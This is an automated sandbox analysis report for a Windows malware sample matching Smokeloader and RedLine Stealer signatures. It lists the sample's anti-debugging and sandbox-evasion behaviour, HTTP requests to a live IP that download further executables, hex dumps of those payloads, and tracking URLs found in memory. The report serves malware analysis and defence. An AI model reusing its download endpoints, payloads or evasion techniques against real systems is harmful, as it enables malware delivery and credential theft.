Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tXEKP1ThBP.exe

Overview

General Information

Sample name:tXEKP1ThBP.exe
renamed because original name is a hash value
Original sample name:6d81636af92fae98c45898823e103e4f.exe
Analysis ID:1578930
MD5:6d81636af92fae98c45898823e103e4f
SHA1:00de607eb0d08dd7936211f25ea4019443e52dd1
SHA256:18d3935ee40dffa59b390df8f2544c8a08ab9d5f997b57940b843356127ead92
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • tXEKP1ThBP.exe (PID: 6624 cmdline: "C:\Users\user\Desktop\tXEKP1ThBP.exe" MD5: 6D81636AF92FAE98C45898823E103E4F)
    • WerFault.exe (PID: 2508 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 1724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2240532857.0000000000CFA000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1498:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: tXEKP1ThBP.exeAvira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exeReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: tXEKP1ThBP.exeVirustotal: Detection: 73%Perma Link
Source: tXEKP1ThBP.exeReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: tXEKP1ThBP.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,4_2_004034C0
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B13727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,4_2_04B13727
Source: tXEKP1ThBP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00415D07 FindFirstFileExW,4_2_00415D07
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_10007EA9 FindFirstFileExW,4_2_10007EA9
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_04B25F6E FindFirstFileExW,4_2_04B25F6E
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:46:42 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:46:44 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox ViewIP Address: 185.156.73.23 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,4_2_00401880
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: tXEKP1ThBP.exe, 00000004.00000002.2243725772.0000000005560000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=empJ
Source: tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/downloadI
Source: tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/downloada
Source: tXEKP1ThBP.exe, 00000004.00000002.2243725772.0000000005560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
Source: tXEKP1ThBP.exe, 00000004.00000002.2243725772.0000000005560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/keye
Source: tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download%
Source: tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadk
Source: tXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
Source: tXEKP1ThBP.exe, 00000004.00000003.1833803865.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1832699006.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1834947373.000000000581D000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1835090251.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].4.dr, Y-Cleaner.exe.4.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: tXEKP1ThBP.exe, 00000004.00000003.1833803865.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1832699006.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1834947373.000000000581D000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1835090251.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].4.dr, Y-Cleaner.exe.4.drString found in binary or memory: https://g-cleanit.hk
Source: tXEKP1ThBP.exe, 00000004.00000003.1833803865.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1832699006.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1834947373.000000000581D000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1835090251.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].4.dr, Y-Cleaner.exe.4.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2240532857.0000000000CFA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
PE file contains section with special chars
Source: tXEKP1ThBP.exeStatic PE information: section name:
Source: tXEKP1ThBP.exeStatic PE information: section name: .idata
Source: tXEKP1ThBP.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CD7CAA4_3_04CD7CAA
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CC9D604_3_04CC9D60
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CCC7DD4_3_04CCC7DD
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CD37F94_3_04CD37F9
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CD97F24_3_04CD97F2
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CCE7204_3_04CCE720
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CD30E64_3_04CD30E6
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeCode function: 4_3_04CC20704_3_04CC2070
